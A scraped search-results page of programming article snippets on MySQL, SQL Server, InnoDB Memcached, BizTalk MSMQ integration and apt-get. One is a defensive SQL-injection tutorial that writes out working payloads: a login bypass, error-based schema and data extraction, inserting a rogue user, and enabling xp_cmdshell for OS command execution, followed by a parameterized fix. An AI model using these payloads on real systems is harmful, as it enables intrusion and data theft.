Search Results

Search found 23901 results on 957 pages for 'mysql stored procedure'.

Page 470/957 | < Previous Page | 466 467 468 469 470 471 472 473 474 475 476 477  | Next Page >

  • Entity Framework Security

    - by NYSystemsAnalyst
    In my organization, we are just beginning to use the Entity Framework for some applications. In the past, we have pushed developers to utilize stored procedures for all database access. In addition to helping with SQL injection, we tried to grant logins access to stored procedures only to keep security relatively tight. Although inserting, updating, and deleting are easily done through stored procedures in the EF, it appears to be difficult to use stored procedures to query data with EF. However, using LINQ or Entity SQL and allowing EF to create the queries means giving a user read access to the entire database. How have others handled this dilemma?

    Read the article

  • new project app; use entirely node.js

    - by Jared
    I have been looking into Node.js, express and Nowjs and love how easy it is to have real time interactions between clients. My background is mostly from CodeIgniter MVC using PHP and MYSql. I want to re make a current web project of mine from scratch to make everything better and more real time with this newer technology. After researching and doing test examples I want to use node.js , express and Nowjs for the real time interactions once someone connects to the socket.io to pull data back to clients. But use Code Igniter for the control of the site and user management , possible shopping cart/store , pretty much everything else. This is purely due to time constraints and that I am already familiar with doing it that way. I have been looking at MongoDB as an alternative to MySql, Basically the app is going to be multiple chat rooms all on one page. with the ability of notifications and private messaging. Lots of data transfer and images. before I started piecing it together I wanted to get people who have already done something similar. My model would use Code Igniter and MySQL to render the page and then connect them onto a node.js server and broadcast using express and nowjs would using a mongoDB be better than mySQL for tons of messages and data being stored or MYSQL? Also does it make since to not make the whole site on Node.js , kinda piece it together like that?

    Read the article

  • How to check an exectuable's path is correct in PHP?

    - by nickf
    I'm writing a setup/installer script for my application, basically just a nice front end to the configuration file. One of the configuration variables is the executable path for mysql. After the user has typed it in (for example: /path/to/mysql-5.0/bin/mysql or just mysql if it is in their system PATH), I want to verify that it is correct. My initial reaction would be to try running it with "--version" to see what comes back. However, I quickly realised this would lead to me writing this line of code: shell_exec($somethingAUserHasEntered . " --version"); ...which is obviously a Very Bad Thing. Now, this is a setup script which is designed for trusted users only, and ones which probably already have relatively high level access to the system, but still I don't think the above solution is something I want to write. Is there a better way to verify the executable path? Perhaps one which doesn't expose a massive security hole?

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • New Enhancements for InnoDB Memcached

    - by Calvin Sun
    In MySQL 5.6, we continued our development on InnoDB Memcached and completed a few widely desirable features that make InnoDB Memcached a competitive feature in more scenario. Notablely, they are 1) Support multiple table mapping 2) Added background thread to auto-commit long running transactions 3) Enhancement in binlog performance  Let’s go over each of these features one by one. And in the last section, we will go over a couple of internally performed performance tests. Support multiple table mapping In our earlier release, all InnoDB Memcached operations are mapped to a single InnoDB table. In the real life, user might want to use this InnoDB Memcached features on different tables. Thus being able to support access to different table at run time, and having different mapping for different connections becomes a very desirable feature. And in this GA release, we allow user just be able to do both. We will discuss the key concepts and key steps in using this feature. 1) "mapping name" in the "get" and "set" command In order to allow InnoDB Memcached map to a new table, the user (DBA) would still require to "pre-register" table(s) in InnoDB Memcached “containers” table (there is security consideration for this requirement). If you would like to know about “containers” table, please refer to my earlier blogs in blogs.innodb.com. Once registered, the InnoDB Memcached will then be able to look for such table when they are referred. Each of such registered table will have a unique "registration name" (or mapping_name) corresponding to the “name” field in the “containers” table.. To access these tables, user will include such "registration name" in their get or set commands, in the form of "get @@new_mapping_name.key", prefix "@@" is required for signaling a mapped table change. The key and the "mapping name" are separated by a configurable delimiter, by default, it is ".". So the syntax is: get [@@mapping_name.]key_name set [@@mapping_name.]key_name  or  get @@mapping_name set @@mapping_name Here is an example: Let's set up three tables in the "containers" table: The first is a map to InnoDB table "test/demo_test" table with mapping name "setup_1" INSERT INTO containers VALUES ("setup_1", "test", "demo_test", "c1", "c2", "c3", "c4", "c5", "PRIMARY");  Similarly, we set up table mappings for table "test/new_demo" with name "setup_2" and that to table "mydatabase/my_demo" with name "setup_3": INSERT INTO containers VALUES ("setup_2", "test", "new_demo", "c1", "c2", "c3", "c4", "c5", "secondary_index_x"); INSERT INTO containers VALUES ("setup_3", "my_database", "my_demo", "c1", "c2", "c3", "c4", "c5", "idx"); To switch to table "my_database/my_demo", and get the value corresponding to “key_a”, user will do: get @@setup_3.key_a (this will also output the value that corresponding to key "key_a" or simply get @@setup_3 Once this is done, this connection will switch to "my_database/my_demo" table until another table mapping switch is requested. so it can continue issue regular command like: get key_b  set key_c 0 0 7 These DMLs will all be directed to "my_database/my_demo" table. And this also implies that different connections can have different bindings (to different table). 2) Delimiter: For the delimiter "." that separates the "mapping name" and key value, we also added a configure option in the "config_options" system table with name of "table_map_delimiter": INSERT INTO config_options VALUES("table_map_delimiter", "."); So if user wants to change to a different delimiter, they can change it in the config_option table. 3) Default mapping: Once we have multiple table mapping, there should be always a "default" map setting. For this, we decided if there exists a mapping name of "default", then this will be chosen as default mapping. Otherwise, the first row of the containers table will chosen as default setting. Please note, user tables can be repeated in the "containers" table (for example, user wants to access different columns of the table in different settings), as long as they are using different mapping/configure names in the first column, which is enforced by a unique index. 4) bind command In addition, we also extend the protocol and added a bind command, its usage is fairly straightforward. To switch to "setup_3" mapping above, you simply issue: bind setup_3 This will switch this connection's InnoDB table to "my_database/my_demo" In summary, with this feature, you now can direct access to difference tables with difference session. And even a single connection, you can query into difference tables. Background thread to auto-commit long running transactions This is a feature related to the “batch” concept we discussed in earlier blogs. This “batch” feature allows us batch the read and write operations, and commit them only after certain calls. The “batch” size is controlled by the configure parameter “daemon_memcached_w_batch_size” and “daemon_memcached_r_batch_size”. This could significantly boost performance. However, it also comes with some disadvantages, for example, you will not be able to view “uncommitted” operations from SQL end unless you set transaction isolation level to read_uncommitted, and in addition, this will held certain row locks for extend period of time that might reduce the concurrency. To deal with this, we introduce a background thread that “auto-commits” the transaction if they are idle for certain amount of time (default is 5 seconds). The background thread will wake up every second and loop through every “connections” opened by Memcached, and check for idle transactions. And if such transaction is idle longer than certain limit and not being used, it will commit such transactions. This limit is configurable by change “innodb_api_bk_commit_interval”. Its default value is 5 seconds, and minimum is 1 second, and maximum is 1073741824 seconds. With the help of such background thread, you will not need to worry about long running uncommitted transactions when set daemon_memcached_w_batch_size and daemon_memcached_r_batch_size to a large number. This also reduces the number of locks that could be held due to long running transactions, and thus further increase the concurrency. Enhancement in binlog performance As you might all know, binlog operation is not done by InnoDB storage engine, rather it is handled in the MySQL layer. In order to support binlog operation through InnoDB Memcached, we would have to artificially create some MySQL constructs in order to access binlog handler APIs. In previous lab release, for simplicity consideration, we open and destroy these MySQL constructs (such as THD) for each operations. This required us to set the “batch” size always to 1 when binlog is on, no matter what “daemon_memcached_w_batch_size” and “daemon_memcached_r_batch_size” are configured to. This put a big restriction on our capability to scale, and also there are quite a bit overhead in creating destroying such constructs that bogs the performance down. With this release, we made necessary change that would keep MySQL constructs as long as they are valid for a particular connection. So there will not be repeated and redundant open and close (table) calls. And now even with binlog option is enabled (with innodb_api_enable_binlog,), we still can batch the transactions with daemon_memcached_w_batch_size and daemon_memcached_r_batch_size, thus scale the write/read performance. Although there are still overheads that makes InnoDB Memcached cannot perform as fast as when binlog is turned off. It is much better off comparing to previous release. And we are continuing optimize the solution is this area to improve the performance as much as possible. Performance Study: Amerandra of our System QA team have conducted some performance studies on queries through our InnoDB Memcached connection and plain SQL end. And it shows some interesting results. The test is conducted on a “Linux 2.6.32-300.7.1.el6uek.x86_64 ix86 (64)” machine with 16 GB Memory, Intel Xeon 2.0 GHz CPU X86_64 2 CPUs- 4 Core Each, 2 RAID DISKS (1027 GB,733.9GB). Results are described in following tables: Table 1: Performance comparison on Set operations Connections 5.6.7-RC-Memcached-plugin ( TPS / Qps) with memcached-threads=8*** 5.6.7-RC* X faster Set (QPS) Set** 8 30,000 5,600 5.36 32 59,000 13,000 4.54 128 68,000 8,000 8.50 512 63,000 6.800 9.23 * mysql-5.6.7-rc-linux2.6-x86_64 ** The “set” operation when implemented in InnoDB Memcached involves a couple of DMLs: it first query the table to see whether the “key” exists, if it does not, the new key/value pair will be inserted. If it does exist, the “value” field of matching row (by key) will be updated. So when used in above query, it is a precompiled store procedure, and query will just execute such procedures. *** added “–daemon_memcached_option=-t8” (default is 4 threads) So we can see with this “set” query, InnoDB Memcached can run 4.5 to 9 time faster than MySQL server. Table 2: Performance comparison on Get operations Connections 5.6.7-RC-Memcached-plugin ( TPS / Qps) with memcached-threads=8 5.6.7-RC* X faster Get (QPS) Get 8 42,000 27,000 1.56 32 101,000 55.000 1.83 128 117,000 52,000 2.25 512 109,000 52,000 2.10 With the “get” query (or the select query), memcached performs 1.5 to 2 times faster than normal SQL. Summary: In summary, we added several much-desired features to InnoDB Memcached in this release, allowing user to operate on different tables with this Memcached interface. We also now provide a background commit thread to commit long running idle transactions, thus allow user to configure large batch write/read without worrying about large number of rows held or not being able to see (uncommit) data. We also greatly enhanced the performance when Binlog is enabled. We will continue making efforts in both performance enhancement and functionality areas to make InnoDB Memcached a good demo case for our InnoDB APIs. Jimmy Yang, September 29, 2012

    Read the article

  • BizTalk and SQL: Alternatives to the SQL receive adapter. Using Msmq to receive SQL data

    - by Leonid Ganeline
    If we have to get data from the SQL database, the standard way is to use a receive port with SQL adapter. SQL receive adapter is a solicit-response adapter. It periodically polls the SQL database with queries. That’s only way it can work. Sometimes it is undesirable. With new WCF-SQL adapter we can use the lightweight approach but still with the same principle, the WCF-SQL adapter periodically solicits the database with queries to check for the new records. Imagine the situation when the new records can appear in very broad time limits, some - in a second interval, others - in the several minutes interval. Our requirement is to process the new records ASAP. That means the polling interval should be near the shortest interval between the new records, a second interval. As a result the most of the poll queries would return nothing and would load the database without good reason. If the database is working under heavy payload, it is very undesirable. Do we have other choices? Sure. We can change the polling to the “eventing”. The good news is the SQL server could issue the event in case of new records with triggers. Got a new record –the trigger event is fired. No new records – no the trigger events – no excessive load to the database. The bad news is the SQL Server doesn’t have intrinsic methods to send the event data outside. For example, we would rather use the adapters that do listen for the data and do not solicit. There are several such adapters-listeners as File, Ftp, SOAP, WCF, and Msmq. But the SQL Server doesn’t have methods to create and save files, to consume the Web-services, to create and send messages in the queue, does it? Can we use the File, FTP, Msmq, WCF adapters to get data from SQL code? Yes, we can. The SQL Server 2005 and 2008 have the possibility to use .NET code inside SQL code. See the SQL Integration. How it works for the Msmq, for example: ·         New record is created, trigger is fired ·         Trigger calls the CLR stored procedure and passes the message parameters to it ·         The CLR stored procedure creates message and sends it to the outgoing queue in the SQL Server computer. ·         Msmq service transfers message to the queue in the BizTalk Server computer. ·         WCF-NetMsmq adapter receives the message from this queue. For the File adapter the idea is the same, the CLR stored procedure creates and stores the file with message, and then the File adapter picks up this file. Using WCF-NetMsmq adapter to get data from SQL I am describing the full set of the deployment and development steps for the case with the WCF-NetMsmq adapter. Development: 1.       Create the .NET code: project, class and method to create and send the message to the MSMQ queue. 2.       Create the SQL code in triggers to call the .NET code. Installation and Deployment: 1.       SQL Server: a.       Register the CLR assembly with .NET (CLR) code b.      Install the MSMQ Services 2.       BizTalk Server: a.       Install the MSMQ Services b.      Create the MSMQ queue c.       Create the WCF-NetMsmq receive port. The detailed description is below. Code .NET code … using System.Xml; using System.Xml.Linq; using System.Xml.Serialization;   //namespace MyCompany.MySolution.MyProject – doesn’t work. The assembly name is MyCompany.MySolution.MyProject // I gave up with the compound namespace. Seems the CLR Integration cannot work with it L. Maybe I’m wrong.     public class Event     {         static public XElement CreateMsg(int par1, int par2, int par3)         {             XNamespace ns = "http://schemas.microsoft.com/Sql/2008/05/TypedPolling/my_storedProc";             XElement xdoc =                 new XElement(ns + "TypedPolling",                     new XElement(ns + "TypedPollingResultSet0",                         new XElement(ns + "TypedPollingResultSet0",                             new XElement(ns + "par1", par1),                             new XElement(ns + "par2", par2),                             new XElement(ns + "par3", par3),                         )                     )                 );             return xdoc;         }     }   //////////////////////////////////////////////////////////////////////// … using System.ServiceModel; using System.ServiceModel.Channels; using System.Transactions; using System.Data; using System.Data.Sql; using System.Data.SqlTypes;   public class MsmqHelper {     [Microsoft.SqlServer.Server.SqlProcedure]     // msmqAddress as "net.msmq://localhost/private/myapp.myqueue";     public static void SendMsg(string msmqAddress, string action, int par1, int par2, int par3)     {         using (TransactionScope scope = new TransactionScope(TransactionScopeOption.Suppress))         {             NetMsmqBinding binding = new NetMsmqBinding(NetMsmqSecurityMode.None);             binding.ExactlyOnce = true;             EndpointAddress address = new EndpointAddress(msmqAddress);               using (ChannelFactory<IOutputChannel> factory = new ChannelFactory<IOutputChannel>(binding, address))             {                 IOutputChannel channel = factory.CreateChannel();                 try                 {                     XElement xe = Event.CreateMsg(par1, par2, par3);                     XmlReader xr = xe.CreateReader();                     Message msg = Message.CreateMessage(MessageVersion.Default, action, xr);                     channel.Send(msg);                     //SqlContext.Pipe.Send(…); // to test                 }                 catch (Exception ex)                 { …                 }             }             scope.Complete();         }     }   SQL code in triggers   -- sp_SendMsg was registered as a name of the MsmqHelper.SendMsg() EXEC sp_SendMsg'net.msmq://biztalk_server_name/private/myapp.myqueue', 'Create', @par1, @par2, @par3   Installation and Deployment On the SQL Server Registering the CLR assembly 1.       Prerequisites: .NET 3.5 SP1 Framework. It could be the issue for the production SQL Server! 2.       For more information, please, see the link http://nielsb.wordpress.com/sqlclrwcf/ 3.       Copy files: >copy “\Windows\Microsoft.net\Framework\v3.0\Windows Communication Foundation\Microsoft.Transactions.Bridge.dll” “\Program Files\Reference Assemblies\Microsoft\Framework\v3.0 \Microsoft.Transactions.Bridge.dll” If your machine is a 64-bit, run two commands: >copy “\Windows\Microsoft.net\Framework\v3.0\Windows Communication Foundation\Microsoft.Transactions.Bridge.dll” “\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0 \Microsoft.Transactions.Bridge.dll” >copy “\Windows\Microsoft.net\Framework64\v3.0\Windows Communication Foundation\Microsoft.Transactions.Bridge.dll” “\Program Files\Reference Assemblies\Microsoft\Framework\v3.0 \Microsoft.Transactions.Bridge.dll” 4.       Execute the SQL code to register the .NET assemblies: -- For x64 OS: CREATE ASSEMBLY SMdiagnostics AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMdiagnostics.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.Web] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\System.Web.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.Messaging] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.Messaging.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.ServiceModel] AUTHORIZATION dbo FROM 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dll' WITH permission_set = unsafe CREATE ASSEMBLY [System.Xml.Linq] AUTHORIZATION dbo FROM 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll' WITH permission_set = unsafe   -- For x32 OS: --CREATE ASSEMBLY SMdiagnostics AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMdiagnostics.dll' WITH permission_set = unsafe --CREATE ASSEMBLY [System.Web] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.Web.dll' WITH permission_set = unsafe --CREATE ASSEMBLY [System.Messaging] AUTHORIZATION dbo FROM 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.Messaging.dll' WITH permission_set = unsafe --CREATE ASSEMBLY [System.ServiceModel] AUTHORIZATION dbo FROM 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dll' WITH permission_set = unsafe 5.       Register the assembly with the external stored procedure: CREATE ASSEMBLY [HelperClass] AUTHORIZATION dbo FROM ’<FilePath>MyCompany.MySolution.MyProject.dll' WITH permission_set = unsafe where the <FilePath> - the path of the file on this machine! 6. Create the external stored procedure CREATE PROCEDURE sp_SendMsg (        @msmqAddress nvarchar(100),        @Action NVARCHAR(50),        @par1 int,        @par2 int,        @par3 int ) AS EXTERNAL NAME HelperClear.MsmqHelper.SendMsg   Installing the MSMQ Services 1.       Check if the MSMQ service is NOT installed. To check:  Start / Administrative Tools / Computer Management, on the left pane open the “Services and Applications”, search to the “Message Queuing”. If you cannot see it, follow next steps. 2.       Start / Control Panel / Programs and Features 3.       Click “Turn Windows Features on or off” 4.       Click Features, click “Add Features” 5.       Scroll down the feature list; open the “Message Queuing” / “Message Queuing Services”; and check the “Message Queuing Server” option  6.       Click Next; Click Install; wait to the successful finish of the installation Creating the MSMQ queue We don’t need to create the queue on the “sender” side. On the BizTalk Server Installing the MSMQ Services The same is as for the SQL Server. Creating the MSMQ queue 1.       Start / Administrative Tools / Computer Management, on the left pane open the “Services and Applications”, open the “Message Queuing”, and open the “Private Queues”. 2.       Right-click the “Private Queues”; choose New; choose “Private Queue”. 3.       Type the Queue name as ’myapp.myqueue'; check the “Transactional” option. Creating the WCF-NetMsmq receive port I will not go through this step in all details. It is straightforward. URI for this receive location should be 'net.msmq://localhost/private/myapp.myqueue'. Notes ·         The biggest problem is usually on the step the “Registering the CLR assembly”. It is hard to predict where are the assemblies from the assembly list, what version should be used, x86 or x64. It is pity of such “rude” integration of the SQL with .NET. ·         In couple cases the new WCF-NetMsmq port was not able to work with the queue. Try to replace the WCF- NetMsmq port with the WCF-Custom port with netMsmqBinding. It was working fine for me. ·         To test how messages go through the queue you can turn on the Journal /Enabled option for the queue. I used the QueueExplorer utility to look to the messages in Journal. The Computer Management can also show the messages but it shows only small part of the message body and in the weird format. The QueueExplorer can do the better job; it shows the whole body and Xml messages are in good color format.

    Read the article

  • Why does apt-get install Skype easily while aptitude complains about MAJOR dependency errors?

    - by Prateek
    I was trying to install Skype on Ubuntu 13.04, from the Canonical repositories. With apt-get it worked easily, while aptitude had a huge problem with dependencies and proposed a complicated solution. Why is this so? Why doesn't aptitude offer whatever apt-get does as a potential solution? Here is the output of both: apt-get install skype: Reading package lists... Building dependency tree... Reading state information... The following extra packages will be installed: gcc-4.7-base:i386 libasound2 libasound2:i386 libasound2-plugins:i386 libasyncns0:i386 libaudio2:i386 libavahi-client3:i386 libavahi-common-data:i386 libavahi-common3:i386 libc6:i386 libcomerr2:i386 libcups2:i386 libdbus-1-3 libdbus-1-3:i386 libdbusmenu-qt2:i386 libdrm-intel1 libdrm-intel1:i386 libdrm-nouveau2 libdrm-nouveau2:i386 libdrm-radeon1 libdrm-radeon1:i386 libdrm2 libdrm2:i386 libexpat1:i386 libffi6:i386 libflac8:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386 libgcrypt11 libgcrypt11:i386 libgl1-mesa-dri libgl1-mesa-dri:i386 libgl1-mesa-glx:i386 libglapi-mesa:i386 libglib2.0-0:i386 libgnutls26 libgnutls26:i386 libgpg-error0:i386 libgssapi-krb5-2:i386 libgstreamer-plugins-base0.10-0:i386 libgstreamer0.10-0:i386 libice6:i386 libjack-jackd2-0:i386 libjbig0:i386 libjpeg-turbo8:i386 libjpeg8:i386 libjson0:i386 libk5crypto3:i386 libkeyutils1:i386 libkrb5-3:i386 libkrb5support0:i386 liblcms1:i386 libllvm3.2:i386 liblzma5:i386 libmng1:i386 libmysqlclient18:i386 libogg0:i386 liborc-0.4-0:i386 libp11-kit0:i386 libpciaccess0:i386 libpcre3:i386 libpng12-0:i386 libpulse0:i386 libqt4-dbus libqt4-dbus:i386 libqt4-declarative libqt4-declarative:i386 libqt4-designer libqt4-help libqt4-network libqt4-network:i386 libqt4-opengl libqt4-opengl:i386 libqt4-script libqt4-script:i386 libqt4-scripttools libqt4-sql libqt4-sql:i386 libqt4-sql-mysql:i386 libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xml:i386 libqt4-xmlpatterns libqt4-xmlpatterns:i386 libqtcore4 libqtcore4:i386 libqtgui4 libqtgui4:i386 libqtwebkit4:i386 libsamplerate0:i386 libselinux1:i386 libsm6:i386 libsndfile1:i386 libspeexdsp1:i386 libsqlite3-0:i386 libssl1.0.0 libssl1.0.0:i386 libstdc++6:i386 libtasn1-3:i386 libtiff5 libtiff5:i386 libtxc-dxtn-s2tc0:i386 libuuid1:i386 libvorbis0a:i386 libvorbisenc2:i386 libwrap0:i386 libx11-6 libx11-6:i386 libx11-xcb1 